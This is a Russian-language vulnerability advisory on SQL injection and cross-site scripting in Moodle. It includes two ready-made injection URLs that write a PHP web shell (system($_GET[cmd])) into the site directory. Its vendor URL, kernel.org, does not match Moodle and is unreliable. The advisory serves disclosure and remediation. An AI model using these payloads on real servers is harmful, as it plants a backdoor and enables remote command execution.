Межсайтовый скриптинг и SQL-инъекция в Moodle

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных приложения.

1. Уязвимость обнаружена при обработке входных данных в параметре “id” в сценариях "category.php" и "info.php" и в параметре "user" в сценарии "plot.php". Удаленный пользователь может с помощью специально сформированного запроса выполнит произвольные SQL команды в базе данных приложения. Для удачной эксплуатации уязвимости опция "magic_quotes_gpc" должна быть выключена.Пример:

http://[target]/[path]/course/category.php?id='%20UNION
%20SELECT%200,'<?php%20system($_GET[cmd]);%20
?>',0,0,0,0,0,0%20INTO%20DUMPFILE%20'../../www/
moodle/shell.php'%20FROM%20mdl_course_categories/*

http://[target]/[path]/course/info.php?id='UNION%20SELECT
%200,0,0,0,'<?php%20system($_GET[cmd]);%20?>',0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20INTO%20
DUMPFILE%20'../../www/moodle/shell.php'%20FROM%20mdl_course/*

2. Межсайтовый скриптинг возможен из-за недостаточной обработки входных данных в параметре "jump" сценария "jumpto.php". Удаленный пользователь может выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

URL производителя: kernel.org

Решение: Установите последнюю версию (1.6dev) с сайта производителя.

Источник: